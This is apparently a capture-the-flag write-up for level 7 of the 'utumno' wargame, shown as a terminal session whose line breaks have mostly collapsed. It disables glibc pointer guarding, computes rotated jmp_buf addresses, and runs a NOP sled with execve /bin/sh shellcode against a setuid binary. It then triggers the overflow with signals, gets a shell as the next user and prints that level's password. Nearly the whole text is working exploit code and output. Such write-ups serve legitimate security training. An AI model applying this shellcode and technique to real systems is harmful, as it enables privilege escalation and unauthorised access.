utumno - 7

root@today:~/Desktop/misc/utumno/utumno6# ssh utumno7@178.79.134.250utumno7@178.79.134.250's password: totiquegaeutumno7@melinda:~$ mkdir /tmp/utu7utumno7@melinda:~$ cd /tmp/utu7utumno7@melinda:~$ export LD_POINTER_GUARD=0(LD_POINTER_GUARD(glibc since 2.4) Set to 0 to disable pointer guarding. Any other value enables pointer guarding, which is also the default.Pointer guarding is a security mechanism whereby some pointers to code stored in writable program memory (return addresses saved bysetjmp(3) or function pointers used by various glibc internals) are mangled semi-randomly to make it more difficult for an attackerto hijack the pointers for use in the event of a buffer overrun or stack-smashing attack.)

# stack environment---------eip (rol eip, 0x09 ; rotation left 9bits)---------esp (rol esp, 0x09 ; rotation left 9bits)---------ebp---------edi---------esi---------ebx--------- jmp_buf(esp + 0x90)128B--------- buffer(esp + 0x10)#we use gdb to get the buffer address. it's 0xffffd420#rol 0xffffd420,0x9 == 0xffa841ff#we set jmp_buf.esp = 0xffa841ff, jmp_buf.eip = 0xffa841ff

utumno7@melinda:/tmp/utu7$ /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`^Z[1]+  Stopped                 /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`utumno7@melinda:/tmp/utu7$ jobs -l[1]+ 27875 Stopped                 /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`utumno7@melinda:/tmp/utu7$ kill -10 27875utumno7@melinda:/tmp/utu7$ fg/utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`^Z[1]+  Stopped                 /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`utumno7@melinda:/tmp/utu7$ kill -12 27875utumno7@melinda:/tmp/utu7$ fg/utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`$ whoamiutumno8$ cat /etc/utumno_pass/utumno8jaeyeetiav$

ref[1]: http://hacktracking.blogspot.com/2013/06/utumno-wargame-level-7.html